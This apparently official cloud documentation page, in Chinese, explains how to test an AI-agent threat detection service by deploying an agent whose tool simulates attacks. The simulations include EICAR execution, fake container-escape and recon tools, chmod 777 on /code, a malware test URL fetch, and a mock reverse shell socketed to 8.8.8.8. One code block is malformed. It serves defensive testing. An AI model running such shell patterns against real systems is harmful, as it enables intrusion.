测试 Agent Platform Threat Detection

本页面介绍了如何通过有意触发检测器并检查发现结果来验证 Agent Platform Threat Detection 是否正常运行。Agent Platform Threat Detection 是 Security Command Center 内置的一项服务。

准备工作

如需检测 Agent Runtime 代理的潜在威胁,请确保 在 Security Command Center 中启用 Agent Platform Threat Detection 服务

设置环境

如需测试 Agent Platform Threat Detection,请设置一个模拟恶意活动的演示代理。

创建项目并激活 shell

选择或创建要用于测试的 Google Cloud 项目。

如需测试检测器,您可以使用 Google Cloud 控制台和 Cloud Shell。

  1. 前往Google Cloud 控制台

    前往 Google Cloud 控制台

  2. 选择要用于测试的项目。

  3. 点击激活 Cloud Shell

您还可以从本地 shell 运行测试说明。

设置 Agent Runtime

如果您之前未在此项目中使用过 Agent Runtime, 请先设置 Agent Runtime 环境,然后再开始。记录您创建的 Cloud Storage 暂存存储桶的名称。我们还建议您按照 Agent Runtime 快速入门 中的说明,了解如何使用 Vertex AI SDK 开发和部署代理。

创建测试脚本

您将创建多个文件,这些文件将用于部署新代理以进行测试。为此,请使用文本编辑器,例如 nano

  1. 创建一个名为 requirements.txt 的新文件,其中包含以下内容。

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. 创建一个名为 installation_scripts/install.sh 的新空文件。某些测试需要向此文件添加内容。

  3. 创建一个名为 main.py 的新文件,其中包含以下内容。替换 PROJECT_IDLOCATIONSTAGING_BUCKET 变量。 暂存存储桶名称必须包含 gs:// 前缀。

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

设置虚拟环境

  1. 创建并激活 Python 虚拟环境。

      python3 -m venv env
      source env/bin/activate
    
  2. 在虚拟环境中安装必要的依赖项。

    pip install -r requirements.txt
    

测试脚本

使用 python3 main.py 从虚拟环境内部运行脚本。 此命令需要几分钟时间来构建、部署和执行测试代理。

该脚本会输出已部署代理的资源名称,以及一些 JSON 对象,包括 LLM 响应和其他元数据。如果您在此阶段遇到 权限错误或部署错误,请参阅 问题排查以了解后续 步骤。

测试检测器

如需测试 Agent Platform Threat Detection 检测器,请将 threat_detection_test 函数中的代码替换为模拟攻击的代码。该脚本可能需要很长时间才能部署和查询代理。如需加快测试速度,您可以将其中几个函数的内容合并在一起。

执行:已执行添加的恶意二进制文件

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

执行:加载了添加的恶意库

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。您可能会收到来自 Vertex AI SDK 的有关解析响应的错误,但系统仍会生成发现结果。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

执行:容器逃逸

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

执行:Kubernetes 攻击工具执行

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

执行:本地侦察工具执行

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

执行:已执行修改的恶意二进制文件

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

执行:加载了修改的恶意库

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

观察到恶意网址

使用以下内容更新 installation_scripts/install.sh 文件。

#!/bin/bash
apt-get install -y curl --no-install-recommends

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

反向 shell

替换测试脚本中的 threat_detection_test 函数,然后运行测试脚本。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

后续步骤